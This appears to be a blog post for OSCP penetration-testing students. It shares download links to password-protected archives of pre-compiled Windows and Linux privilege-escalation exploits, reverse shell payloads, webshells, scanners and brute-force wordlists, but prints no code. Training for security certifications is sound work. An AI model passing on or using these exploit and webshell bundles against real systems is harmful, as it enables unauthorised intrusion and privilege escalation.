I uploaded those pre-compiled exploits in mediafire with password protected, but i discourage that  becoz exploit compilation is one of the exercise in the course so you have to do it your own. if anyone need that mail me at sathisharthar@gmail.com  (Note: don’t try to bruteforce it, its more than  20 words)


http://www.securitysift.com/download/MS_privesc_and_exploits_table.csv


Windows  Tools, Scripts and Pre-Compiled Exploit for Remote and Priviledge Escalation:


http://download1582.mediafire.com/atk42ybutgcg/wqnw5c3ljgudqiv/windows.zip


I added some tools and script in that for windows machines.


Screenshot from 2015-01-27 19:11:47


Screenshot from 2015-01-27 19:12:22


Screenshot from 2015-01-27 19:12:51


Screenshot from 2015-01-27 19:13:47


Linux Precompiled Exploits for Local Root Exploit:


http://www.mediafire.com/download/os1i1ble6b0sm8g/linux.zip


Screenshot from 2015-01-27 19:15:08


Screenshot from 2015-01-27 19:15:30


Some Usefull PenTesting scripts:


http://www.mediafire.com/download/j4qz4y41qfrjo9m/script.zip


Screenshot from 2015-01-27 19:16:00


Usefull Network Service Scanning Scripts:


http://www.mediafire.com/download/03xld2cb755jd4p/scanner.zip


Screenshot from 2015-01-27 19:15:45


Usefull  Wordlist For Bruteforce:


http://www.mediafire.com/download/sv4hs7p67924yk9/wordlists.zip


Usefull Reverse Shell Payloads and Webshells:


http://www.mediafire.com/download/fs5pa4nq3nhi8ja/shell.zip

http://www.mediafire.com/download/p0f77dblr2yzeaa/webshells.zip


Screenshot from 2015-01-27 19:16:20


I Hopes, It will helpful for guys who doing OSCP Training and Exam. If any doubts related to the post ping me…
About these ads
Tags: (OSCP), offsec, oscp exam hints, oscp exam tips, oscp lab hints, oscp lab tips, oscp tips, OSCP Tips and Tricks, oscp tricks, Penetration Testing with Kali Linux, The Offensive Security Certified Professional